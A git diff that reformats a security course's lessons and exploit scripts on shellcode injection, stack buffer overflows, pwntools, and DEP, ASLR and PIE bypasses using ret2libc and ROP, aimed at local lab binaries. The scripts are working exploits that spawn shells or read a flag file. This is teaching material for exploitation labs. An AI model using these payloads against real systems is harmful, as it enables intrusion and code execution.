: @@ -251,7 +245,7 @@ $ objdump -d -M intel ./vuln We then determine the address of the global buffer which holds our code and craft our second payload (remember to reverse the bytes because our systems are little endian): -``` +```console $ nm ./vuln | grep machine_code 0000000000404060 T machine_code @@ -260,29 +254,31 @@ $ perl -e 'print "A" x (16 + 8) . "\x60\x40\x40\x00\x00\x00\x00\x00"' Now all we need to do is concatenate our two payloads: -``` +```console $ perl -e "print \"$(hexdump -v -e '"\\" 1/1 "x%02x"' ./hello_shellcode.bin)\" . \"A\" x (128 - 42) . \"A\" x (16 + 8) . \"\x60\x40\x40\x00\x00\x00\x00\x00\"" | ./vuln Hello, world! [1] 53760 done perl -e | 53762 segmentation fault (core dumped) ./vuln ``` -As you can see, even with simple exploits, payloads quickly become unwieldy. Our advice is to make use of a script in a language like python. There is one such script example in the task directory. +As you can see, even with simple exploits, payloads quickly become unwieldy. +Our advice is to make use of a script in a language like python. +There is one such script example in the task directory. -Even though we succeeded in printing our message, the program then ended abruptly with a _Segmentation fault_. Pause for a second to figure out why that is. +Even though we succeeded in printing our message, the program then ended abruptly with a "Segmentation fault" message. +Pause for a second to figure out why that is. -
- Answer here +Because we hijacked normal control flow, the program does not reach the end of the `main` function to terminate gracefully, but instead continues to attempt to execute instructions from the `machine_code` global var. +We can help the program exit gracefully by extending our shellcode to also perform an `exit(0)` syscall after the `write`. +Remember to check the size of the new shellcode and update the padding accordingly! - Because we hijacked normal control flow, the program does not reach the end of the `main` function to terminate gracefully, but instead continues to attempt to execute instructions from the `machine_code` global var. We can help the program exit gracefully by extending our shellcode to also perform an `exit(0)` syscall after the `write`. Remember to check the size of the new shellcode and update the padding accordingly! +### 05. Tutorial: Debugging Shellcodes -
+How can we **know** that our shellcode worked properly? +Sometimes its external effects are not immediately visible; +if it involves any system calls, we can make use of `strace`: -## 05. Tutorial: Debugging shellcodes - -How can we **know** that our shellcode worked properly? Sometimes its external effects are not immediately visible; if it involves any system calls, we can make use of `strace`: - -``` +```console $ printf '1'$(hexdump -v -e '"\\" 1/1 "x%02x"' exit_shellcode.bin) | strace ./vuln2 execve("./vuln2", ["./vuln2"], 0x7ffdb027a9d0 /* 77 vars */) = 0 .... @@ -290,12 +286,10 @@ exit(42) = ? +++ exited with 42 +++ ``` -A more productive approach is to use `gdb` to inspect the execution of the shellcode step by step. Load the program, break on the shellcode address, feed it the input and run: +A more productive approach is to use `gdb` to inspect the execution of the shellcode step by step. +Load the program, break on the shellcode address, feed it the input and run: -
- GDB output - -``` +```console $ gdb ./vuln Reading symbols from ./vuln... gdb-peda$ b *main+56 @@ -386,29 +380,32 @@ EFLAGS: 0x207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow) Legend: code, data, rodata, value 0x0000000000404060 in machine_code () gdb-peda$ - ``` -
-# Challenges +## Challenges -## 06. Challenge: /bin/sh shellcode +### 06. Challenge: /bin/sh Shellcode -You are given a piece of assembly code that attempts to spawn a shell with the aid of the `execve` syscall. However, the given code is buggy and it will not work. Your task is to figure out what's wrong with it and fix it. +You are given a piece of assembly code that attempts to spawn a shell with the aid of the `execve` syscall. +However, the given code is buggy and it will not work. +Your task is to figure out what's wrong with it and fix it. -## 07. Challenge: shellcode on stack +### 07. Challenge: Shellcode on Stack -Up until now we have injected code into some memory area, then used a stack-buffer-overflow vulnerability to overwrite a saved return address and hijack control flow. If we think about it, the legitimately reserved buffer space on the stack _is_ a memory area and we could perform our attack using a single read: the overflowing one. +Up until now we have injected code into some memory area, then used a stack-buffer-overflow vulnerability to overwrite a saved return address and hijack control flow. +If we think about it, the legitimately reserved buffer space on the stack _is_ a memory area and we could perform our attack using a single read: the overflowing one. So our payload will consist of the bytes in our shellcode, then some junk to pad the rest of the space to the saved return, then the address of the buffer itself: - - -Now that our shellcode is written on the stack, things become a little harder. Due to several factors (such as the fact that environment variables and command line arguments are placed by the loader on the stack), it is difficult to predict the address at which any value will be placed on the stack. For now, the binary will generously print it for us. +![Shellcode on Stack](../media/shellcode_below.png) + +Now that our shellcode is written on the stack, things become a little harder. 
+Due to several factors (such as the fact that environment variables and command line arguments are placed by the loader on the stack), it is difficult to predict the address at which any value will be placed on the stack. +For now, the binary will generously print it for us. You can observe the volatility of the stack by changing how you launch the program (remember that the path of the binary is considered a command line argument, namely `argv[0]` so it too gets placed on the stack, thus things change depending on what exact relative or absolute path we use): -``` +```console $ ./vuln 0x7fffffffd5d0 $ ../07-challenge-shellcode-on-stack/vuln @@ -425,39 +422,51 @@ $ FOO=bar ./vuln 0x7fffffffd5c0 ``` -## 08. Challenge: shellcode after saved ret +### 08. Challenge: Shellcode after Saved Return Address -In the previous challenge, we placed our shellcode on the stack, in the space between the overflown buffer's beginning and the saved return address. However, we could switch things up and place the shellcode in the area _after_ the saved return address. This might be useful when the stack buffer is too short to hold our payload. +In the previous challenge, we placed our shellcode on the stack, in the space between the overflown buffer's beginning and the saved return address. +However, we could switch things up and place the shellcode in the area **after** the saved return address. +This might be useful when the stack buffer is too short to hold our payload. So our payload will consist of padding junk from the beginning of the buffer to the saved return, the address of the next stack portion, then the bytes of our shellcode. - +![Shellcode Above](../media/shellcode_above.png) -To recap: given a stack-buffer-overflow vulnerability we can not only hijack control flow, but also place a shellcode on the stack using the buggy read.
There are two regions where we can do this: +To recap: given a stack-buffer-overflow vulnerability we can not only hijack control flow, but also place a shellcode on the stack using the buggy read. +There are two regions where we can do this: -* between the buffer start and the saved return. The number of bytes we can write here is determined by _how much space was allocated on the stack_. -* after the saved return. The number of bytes we can write here is determined by _how many bytes are read_. +- between the buffer start and the saved return address: + The number of bytes we can write here is determined by **how much space was allocated on the stack**. +- after the saved return address: + The number of bytes we can write here is determined by **how many bytes are read**. -If any of these regions is too small, we can try the other one. If both of them are too small, that's a problem. However, note that shellcodes are usually tiny. +If any of these regions is too small, we can try the other one. +If both of them are too small, that's a problem. +However, note that shellcodes are usually tiny. -## 09. Challenge: shellcode after saved ret - no leak +### 09. Challenge: Shellcode after Saved Return Address - No Leak -This is the same as the previous challenge, only this time the executable does not conveniently leak the buffer's address. So you will have to deal with the differences between running a binary inside and outside of `gdb` to precisely determine the necessary address, then jump to it. +This is the same as the previous challenge, only this time the executable does not conveniently leak the buffer's address. +So you will have to deal with the differences between running a binary inside and outside of `gdb` to precisely determine the necessary address, then jump to it. -## 10. Challenge: shellcode as command line arg +### 10. 
Challenge: Shellcode as Command Line Argument -As mentioned in the introduction, reading from stdin or from a file isn't the only way to place content inside the memory space of a process. If we can launch the executable, we can modify its environment or command line arguments. The fact that a program might not use its arguments or environment is irrelevant, the loader can't know this, so it places them in the address space anyway. +As mentioned in the introduction, reading from standard input or from a file isn't the only way to place content inside the memory space of a process. +If we can launch the executable, we can modify its environment or command line arguments. +The fact that a program might not use its arguments or environment is irrelevant, the loader can't know this, so it places them in the address space anyway. Take the `/bin/sh` shellcode and feed it to the program as a command-line argument, then exploit the SBO to actually run it. -## 11. Challenge: shellcode in the environment +### 11. Challenge: Shellcode in the Environment Take the `/bin/sh` shellcode and place it in the environment, then exploit the SBO to actually run it. -# Further Reading +## Further Reading -["Smashing The Stack For Fun And Profit", Aleph One](http://phrack.org/issues/49/14.html) - a legendary attack paper documenting SBOs and shellcodes. As it is written in '96, the examples in it will probably _not_ work (either out-of-the-box or with some tweaks). We recommend perusing it for its historical/cultural significance, but don't waste much time on the technical details of the examples. +["Smashing The Stack For Fun And Profit", Aleph One](http://phrack.org/issues/49/14.html) - a legendary attack paper documenting SBOs and shellcodes. +As it is written in '96, the examples in it will probably _not_ work (either out-of-the-box or with some tweaks). 
+We recommend perusing it for its historical/cultural significance, but don't waste much time on the technical details of the examples. -# Resources +## Resources [Shell-storm](http://shell-storm.org/shellcode/) - a repository of shellcodes. diff --git a/extra/pwntools-intro/README.md b/chapters/extra/pwntools-intro/reading/README.md similarity index 78% rename from extra/pwntools-intro/README.md rename to chapters/extra/pwntools-intro/reading/README.md index 5ed56cd..3a389ab 100644 --- a/extra/pwntools-intro/README.md +++ b/chapters/extra/pwntools-intro/reading/README.md @@ -1,17 +1,16 @@ # Pwntools Tutorial ---- -Even though pwntools is an excellent CTF framework, it is also an exploit development library. It was developed by Gallopsled, a European CTF team, under the context that exploit developers have been writing the same tools over and over again with different variations. Pwntools comes to level the playing field and bring together developers to create a common framework of tools. +Even though pwntools is an excellent CTF framework, it is also an exploit development library. +It was developed by Gallopsled, a European CTF team, under the context that exploit developers have been writing the same tools over and over again with different variations. +Pwntools comes to level the playing field and bring together developers to create a common framework of tools. ## Installation ---- -```bash -$ pip install -U pwntools +```console +pip install -U pwntools ``` -## Local and remote I/O ---- +## Local and Remote I/O Pwntools enables you to dynamically interact (through scripting) with either local or remote processes, as follows: @@ -73,7 +72,7 @@ io.interactive() If we run the previous script, we get the following output: -``` +```text [+] Starting local process './leaky': Done Got: Okay, here you go: 0xffe947d8 S @@ -83,7 +82,8 @@ Got: Okay, here you go: 0xffe947d8 S $ ``` -Notice the $ prompt which still awaits input from us to feed the process. 
This is due to the `io.interactive()` line at the end of the script. +Notice the `$` prompt which still awaits input from us to feed the process. +This is due to the `io.interactive()` line at the end of the script. We can encapsulate the previous sequence of interactions inside a function which we can loop. @@ -126,9 +126,10 @@ The flag is: SECRETFLAG ``` ## Logging ---- -The previous example was a bit… quiet. Fortunately, pwntools has nicely separated logging capabilities to make things more verbose for debugging and progress-viewing purposes. Let's log each of our steps within the `leak_char` function. +The previous example was a bit... quiet. +Fortunately, pwntools has nicely separated logging capabilities to make things more verbose for debugging and progress-viewing purposes. +Let's log each of our steps within the `leak_char` function. ```python def leak_char(offset): @@ -151,7 +152,7 @@ def leak_char(offset): Now the output should be much more verbose: -``` +```text [+] Starting local process './leaky': Done [*] Sending request for offset: -10 [*] Got back raw response: Okay, here you go: 0xffb14948 S @@ -188,7 +189,6 @@ Now the output should be much more verbose: ``` ## Assembly and ELF manipulation ---- Pwntools can also be used for precision work, like working with ELF files and their symbols. @@ -206,7 +206,8 @@ log.info("Main at: " + hex(main_addr)) log.info(disasm(leaky_elf.read(main_addr, 14), arch='x86')) ``` -We can also write ELF files from raw assembly; this is very useful for testing shellcodes. +We can also write ELF files from raw assembly; +this is very useful for testing shellcodes. ```python #!/usr/bin/env python @@ -229,14 +230,14 @@ with open('test_shell', 'wb') as f: f.write(e.get_data()) ``` -> This will result in a binary named test_shell which executes the necessary assembly code to spawn a shell. 
-> ```bash -> $ chmod u+x test_shell -> $ ./test_shell -> ``` +This will result in a binary named `test_shell` which executes the necessary assembly code to spawn a shell: + +```console +chmod u+x test_shell +./test_shell +``` ## Shellcode generation ---- Pwntools comes with the `shellcraft` module, which is quite extensive in its capabilities. @@ -286,25 +287,26 @@ These shellcodes can be directly assembled using asm inside your script, and giv ''', arch = 'amd64') ``` +Most of the time you'll be working with a specific vulnerable program. +To avoid specifying the architecture for the `asm` function or for `shellcraft`, you can define the context at the start of the script, which will infer the architecture from the binary header. -> Most of the time you'll be working with as specific vulnerable program. To avoid specifing architecture for the asm function or to shellcraft you can define the context at the start of the script which will imply the architecture from the binary header. -> ```python -> context.binary = './vuln_program' -> -> shellcode = asm(''' -> mov rdi, 0 -> mov rax, 60 -> syscall -> ''') -> print(shellcraft.sh()) -> ``` +```python +context.binary = './vuln_program' + +shellcode = asm(''' + mov rdi, 0 + mov rax, 60 + syscall +''') +print(shellcraft.sh()) +``` ## GDB integration ---- Most importantly, pwntools provides GDB integration, which is extremely useful. Let's follow an example using the following program: + ```asm extern gets extern printf @@ -327,13 +329,16 @@ main: leave ret ``` + Compile it with: -```bash -$ nasm vuln.asm -felf64 -$ gcc -no-pie -fno-pic -fno-stack-protector -z execstack vuln.o -o vuln + +```console +nasm vuln.asm -felf64 +gcc -no-pie -fno-pic -fno-stack-protector -z execstack vuln.o -o vuln ``` Use this script to exploit the program: + ```python #!/usr/bin/env python from pwn import * @@ -379,7 +384,11 @@ p.sendline(payload) p.interactive() ``` -Notice the `gdb.attach(p)` and raw_input lines.
The former will open a new terminal window with GDB already attached. All of your GDB configurations will be used, so this works with PEDA as well. Let's set a breakpoint at the ret instruction from the main function: +Notice the `gdb.attach(p)` and `raw_input()` lines. +The former will open a new terminal window with GDB already attached. +All of your GDB configurations will be used, so this works with PEDA as well. +Let's set a breakpoint at the ret instruction from the main function: + ```gdb gdb-peda$ pdis main Dump of assembler code for function main: @@ -403,6 +412,9 @@ gdb-peda$ c Continuing. ``` -The continue command will return control to the terminal in which we're running the pwntools script. This is where the raw_input comes in handy, because it will wait for you to say “go” before proceeding further. Now if you hit `` at the Send payload? prompt, you will notice that GDB has reached the breakpoint you've previously set. +The continue command will return control to the terminal in which we're running the pwntools script. +This is where the `raw_input()` function comes in handy, because it will wait for you to say "go" before proceeding further. +Now if you hit `<Enter>` at the `Send payload?` prompt, you will notice that GDB has reached the breakpoint you've previously set. -You can now single-step each instruction of the shellcode inside GDB to see that everything is working properly. Once you reach int `0x80`, you can continue again (or close GDB altogether) and interact with the newly spawned shell in the pwntools session. +You can now single-step each instruction of the shellcode inside GDB to see that everything is working properly. +Once you reach `int 0x80`, you can continue again (or close GDB altogether) and interact with the newly spawned shell in the pwntools session.
diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/01-tutorial-bypass-dep-system-sh-present/exploit.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/01-tutorial-bypass-dep-system-sh-present/exploit.py index 87f9a1e..18472a7 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/01-tutorial-bypass-dep-system-sh-present/exploit.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/01-tutorial-bypass-dep-system-sh-present/exploit.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) hidden_address = e.symbols["hidden"] @@ -31,6 +31,6 @@ log.info("payload: " + "".join("\\x{:02x}".format(ord(i)) for i in payload)) io = process(binary) -#gdb.attach(io) +# gdb.attach(io) io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/01-tutorial-bypass-dep-system-sh-present/exploit3.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/01-tutorial-bypass-dep-system-sh-present/exploit3.py index 7109b0d..97a3c95 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/01-tutorial-bypass-dep-system-sh-present/exploit3.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/01-tutorial-bypass-dep-system-sh-present/exploit3.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) hidden_address = e.symbols[b"hidden"] @@ -31,6 +31,6 @@ log.info("payload: " + "".join("\\x{:02x}".format(i) for i in payload)) io = process(binary) -#gdb.attach(io) +# gdb.attach(io) io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/02-tutorial-bypass-dep-system-sh-separate/exploit.py 
b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/02-tutorial-bypass-dep-system-sh-separate/exploit.py index ea4dcb7..6a162f1 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/02-tutorial-bypass-dep-system-sh-separate/exploit.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/02-tutorial-bypass-dep-system-sh-separate/exploit.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) # XXX: We need to add 4 to the PLT address returned by pwntools on ELF files. @@ -31,10 +31,16 @@ # Add a ret gadget that does nothing helpful (it simply jumps to the next # address) to fix issue with stack alignment in do_system() for glibc 2.27: # => 0x7f14bef6c2f6 : movaps XMMWORD PTR [rsp+0x40],xmm0 -payload = offset * "A" + pack(ret) + pack(pop_rdi_ret) + pack(sh_address) + pack(system_plt_address) +payload = ( + offset * "A" + + pack(ret) + + pack(pop_rdi_ret) + + pack(sh_address) + + pack(system_plt_address) +) log.info("payload: " + "".join("\\x{:02x}".format(ord(i)) for i in payload)) io = process(binary) -#gdb.attach(io) +# gdb.attach(io) io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/02-tutorial-bypass-dep-system-sh-separate/exploit3.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/02-tutorial-bypass-dep-system-sh-separate/exploit3.py index 7dfd43a..d09a258 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/02-tutorial-bypass-dep-system-sh-separate/exploit3.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/02-tutorial-bypass-dep-system-sh-separate/exploit3.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) # XXX: We need to add 4 to the 
PLT address returned by pwntools on ELF files. @@ -31,10 +31,16 @@ # Add a ret gadget that does nothing helpful (it simply jumps to the next # address) to fix issue with stack alignment in do_system() for glibc 2.27: # => 0x7f14bef6c2f6 : movaps XMMWORD PTR [rsp+0x40],xmm0 -payload = offset * b"A" + pack(ret) + pack(pop_rdi_ret) + pack(sh_address) + pack(system_plt_address) +payload = ( + offset * b"A" + + pack(ret) + + pack(pop_rdi_ret) + + pack(sh_address) + + pack(system_plt_address) +) log.info("payload: " + "".join("\\x{:02x}".format(i) for i in payload)) io = process(binary) -#gdb.attach(io) +# gdb.attach(io) io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/03-tutorial-bypass-dep-no-aslr-libc/README.md b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/03-tutorial-bypass-dep-no-aslr-libc/README.md index 1f63607..2e5fa7a 100644 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/03-tutorial-bypass-dep-no-aslr-libc/README.md +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/03-tutorial-bypass-dep-no-aslr-libc/README.md @@ -1,12 +1,12 @@ This exploit works with ASLR disabled. To disable ASLR (it's enabled by default on Linux) use: -``` +```console setarch x86_64 -R /bin/bash ``` We find the non-randomized address of the `puts` function in the standard C library by using GDB: -``` +```console $ gdb ./vuln Reading symbols from ./vuln...done. 
(gdb) start @@ -15,6 +15,7 @@ Starting program: /home/razvan/projects/ctf/sss/sss-exploit-internal.git/session Temporary breakpoint 1, main () at vuln.c:13 13 puts("Hello"); + (gdb) p puts $1 = {int (const char *)} 0x7ffff7a64a30 <_IO_puts> ``` diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/03-tutorial-bypass-dep-no-aslr-libc/exploit3.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/03-tutorial-bypass-dep-no-aslr-libc/exploit3.py index 8e78537..739471a 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/03-tutorial-bypass-dep-no-aslr-libc/exploit3.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/03-tutorial-bypass-dep-no-aslr-libc/exploit3.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) @@ -24,7 +24,7 @@ offset = 0x28 # This is determined by dynamic analysis (using GDB). See README.md. 
-puts_address_in_libc = 0x7ffff7a64a30 +puts_address_in_libc = 0x7FFFF7A64A30 libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") puts_offset_in_libc = libc.symbols[b"puts"] @@ -44,10 +44,16 @@ # Add a ret gadget that does nothing helpful (it simply jumps to the next # address) to fix issue with stack alignment in do_system() for glibc 2.27: # => 0x7f14bef6c2f6 : movaps XMMWORD PTR [rsp+0x40],xmm0 -payload = offset * b"A" + pack(ret) + pack(pop_rdi_ret) + pack(sh_address_in_libc) + pack(system_address_in_libc) +payload = ( + offset * b"A" + + pack(ret) + + pack(pop_rdi_ret) + + pack(sh_address_in_libc) + + pack(system_address_in_libc) +) log.info("payload: " + "".join("\\x{:02x}".format(i) for i in payload)) -#gdb.attach(io) +# gdb.attach(io) io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/04-tutorial-bypass-dep-aslr-libc/exploit.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/04-tutorial-bypass-dep-aslr-libc/exploit.py index 2ccef68..b03d144 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/04-tutorial-bypass-dep-aslr-libc/exploit.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/04-tutorial-bypass-dep-aslr-libc/exploit.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) main_address = e.symbols["main"] @@ -32,14 +32,20 @@ # 1st stage payload -payload = offset * "A" + pack(pop_rdi_ret) + pack(puts_got_address) + pack(puts_plt_address) + pack(main_address) +payload = ( + offset * "A" + + pack(pop_rdi_ret) + + pack(puts_got_address) + + pack(puts_plt_address) + + pack(main_address) +) log.info("1st stage payload: " + "".join("\\x{:02x}".format(ord(i)) for i in payload)) io.sendline(payload) io.recvline() msg = io.recvline() msg = msg.strip() -msg = msg + (8-len(msg)) * "\x00" +msg = msg + (8 - len(msg)) * 
"\x00" puts_address_in_libc = unpack(msg) log.info("puts_address_in_libc: 0x{:016x}".format(puts_address_in_libc)) @@ -61,9 +67,15 @@ # Add a ret gadget that does nothing helpful (it simply jumps to the next # address) to fix issue with stack alignment in do_system() for glibc 2.27: # => 0x7f14bef6c2f6 : movaps XMMWORD PTR [rsp+0x40],xmm0 -payload = offset * "A" + pack(ret) + pack(pop_rdi_ret) + pack(sh_address_in_libc) + pack(system_address_in_libc) +payload = ( + offset * "A" + + pack(ret) + + pack(pop_rdi_ret) + + pack(sh_address_in_libc) + + pack(system_address_in_libc) +) log.info("2nd stage payload: " + "".join("\\x{:02x}".format(ord(i)) for i in payload)) -#gdb.attach(io) +# gdb.attach(io) io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/04-tutorial-bypass-dep-aslr-libc/exploit3.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/04-tutorial-bypass-dep-aslr-libc/exploit3.py index b9f6da9..51f1bfe 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/04-tutorial-bypass-dep-aslr-libc/exploit3.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/04-tutorial-bypass-dep-aslr-libc/exploit3.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) main_address = e.symbols[b"main"] @@ -32,14 +32,20 @@ # 1st stage payload -payload = offset * b"A" + pack(pop_rdi_ret) + pack(puts_got_address) + pack(puts_plt_address) + pack(main_address) +payload = ( + offset * b"A" + + pack(pop_rdi_ret) + + pack(puts_got_address) + + pack(puts_plt_address) + + pack(main_address) +) log.info("1st stage payload: " + "".join("\\x{:02x}".format(i) for i in payload)) io.sendline(payload) io.recvline() msg = io.recvline() msg = msg.strip() -msg = msg + (8-len(msg)) * b"\x00" +msg = msg + (8 - len(msg)) * b"\x00" puts_address_in_libc = 
unpack(msg) log.info("puts_address_in_libc: 0x{:016x}".format(puts_address_in_libc)) @@ -61,10 +67,18 @@ # Add a ret gadget that does nothing helpful (it simply jumps to the next # address) to fix issue with stack alignment in do_system() for glibc 2.27: # => 0x7f14bef6c2f6 : movaps XMMWORD PTR [rsp+0x40],xmm0 -payload = offset * b"A" + pack(ret) + pack(pop_rdi_ret) + pack(sh_address_in_libc) + pack(system_address_in_libc) -log.info("2nd stage 2nd stage payload: " + "".join("\\x{:02x}".format(i) for i in payload)) - -#gdb.attach(io) +payload = ( + offset * b"A" + + pack(ret) + + pack(pop_rdi_ret) + + pack(sh_address_in_libc) + + pack(system_address_in_libc) +) +log.info( + "2nd stage 2nd stage payload: " + "".join("\\x{:02x}".format(i) for i in payload) +) + +# gdb.attach(io) io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/05-tutorial-bypass-dep-aslr-pie-rop/sol_pie_bypass.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/05-tutorial-bypass-dep-aslr-pie-rop/sol_pie_bypass.py index 6c38ecc..465a0a4 100644 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/05-tutorial-bypass-dep-aslr-pie-rop/sol_pie_bypass.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/05-tutorial-bypass-dep-aslr-pie-rop/sol_pie_bypass.py @@ -1,27 +1,30 @@ from pwn import * -p = process('./rwslotmachine7') +p = process("./rwslotmachine7") libc = ELF("./libc.so.6") + def do_read(idx): - p.recvuntil('>') - p.sendline('1') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil(']: ') - return int(p.recvuntil('\n')[:-1], 16) + p.recvuntil(">") + p.sendline("1") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("]: ") + return int(p.recvuntil("\n")[:-1], 16) + def do_write(idx, value): - p.recvuntil('>') - p.sendline('2') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil('value:') - p.sendline(hex(value)) 
- -slots_offset = p.elf.symbols['slots'] -strtoll_got_offset = p.elf.got['strtoll'] -puts_got_offset = p.elf.got['puts'] + p.recvuntil(">") + p.sendline("2") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("value:") + p.sendline(hex(value)) + + +slots_offset = p.elf.symbols["slots"] +strtoll_got_offset = p.elf.got["strtoll"] +puts_got_offset = p.elf.got["puts"] dso_handle_offset = p.elf.bss() - 4 index_to_puts = (puts_got_offset - slots_offset) / 4 @@ -32,27 +35,27 @@ def do_write(idx, value): libc_base = libc_leak - libc.symbols["puts"] pie_leak = do_read(index_to_dso_handle) -pie_base = (pie_leak & 0xfffff000) - 0x3000 +pie_base = (pie_leak & 0xFFFFF000) - 0x3000 print(hex(pie_base)) -libc_gadget_esp_30 = libc_base + 0xdbe1c -pop3 = pie_base + 0xbe9 -pop2 = pie_base + 0xbea +libc_gadget_esp_30 = libc_base + 0xDBE1C +pop3 = pie_base + 0xBE9 +pop2 = pie_base + 0xBEA pop1 = pie_base + 0x551 filename_payload = unpack_many("./flag\x00\x00", 32) for i in range(len(filename_payload)): - do_write(i, filename_payload[i]) + do_write(i, filename_payload[i]) open_ = libc_base + libc.symbols["open"] read_ = libc_base + libc.symbols["read"] write_ = libc_base + libc.symbols["write"] -rop = p32(open_) + p32(pop2) + p32(pie_base + slots_offset) + p32(0) +rop = p32(open_) + p32(pop2) + p32(pie_base + slots_offset) + p32(0) rop += p32(read_) + p32(pop3) + p32(3) + p32(pie_base + slots_offset) + p32(0x50) rop += p32(write_) + p32(pop3) + p32(1) + p32(pie_base + slots_offset) + p32(0x50) do_write(index_to_strtoll, libc_gadget_esp_30) -p.sendline('A' * 0xc + rop) +p.sendline("A" * 0xC + rop) p.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/06-challenge-bypass-dep-system-sh-present/sol/exploit3.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/06-challenge-bypass-dep-system-sh-present/sol/exploit3.py index ee48dc9..28617b9 100755 --- 
a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/06-challenge-bypass-dep-system-sh-present/sol/exploit3.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/06-challenge-bypass-dep-system-sh-present/sol/exploit3.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) hidden_address = e.symbols[b"hidden"] @@ -31,7 +31,7 @@ log.info("payload: " + "".join("\\x{:02x}".format(i) for i in payload)) io = process(binary) -#gdb.attach(io) +# gdb.attach(io) io.sendline("Ana") io.sendline(payload) io.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/07-challenge-bypass-dep-system-sh-separate/sol/exploit3.py b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/07-challenge-bypass-dep-system-sh-separate/sol/exploit3.py index 0d2cb33..8b79ca8 100755 --- a/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/07-challenge-bypass-dep-system-sh-separate/sol/exploit3.py +++ b/chapters/mitigations-and-defensive-strategies/bypassing-mitigations/drills/07-challenge-bypass-dep-system-sh-separate/sol/exploit3.py @@ -4,7 +4,7 @@ binary = "./vuln" context.binary = binary -#context.log_level = "debug" +# context.log_level = "debug" e = ELF(binary) # XXX: We need to add 4 to the PLT address returned by pwntools on ELF files. 
